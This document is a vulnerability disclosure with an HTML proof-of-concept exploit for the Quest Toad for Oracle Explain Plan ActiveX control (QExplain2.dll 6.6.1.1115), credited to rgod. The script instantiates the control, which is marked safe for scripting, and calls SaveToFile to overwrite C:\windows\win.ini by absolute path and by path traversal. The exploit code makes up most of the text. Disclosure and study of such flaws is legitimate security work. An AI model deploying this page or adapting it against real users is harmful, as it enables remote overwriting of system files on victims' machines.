Quest Toad for Oracle Explain Plan Display active-x control QExplain2.dll version 6.6.1.1115 suffer from a remote file creation / overwrite vulnerability.
b2afadf82d493424e1bec932d4e244b6fa51c594d4802dfb24e80db9201e79ee
<!--
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)
Remote File Creation / Overwrite
vendor site: https://www.quest.com/
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe
CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
Progid: QExplain2.ExplainPlanDisplayX
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480 />
</object>
<script>
try{
obj.SaveToFile("c:\\windows\\win.ini");
}catch(e){
}
try{
obj.SaveToFile("../../../../../../../../../../windows/win.ini");
}catch(e){
}
</script>
original url: https://retrogod.altervista.org/9sg_quest_toad_poc.htm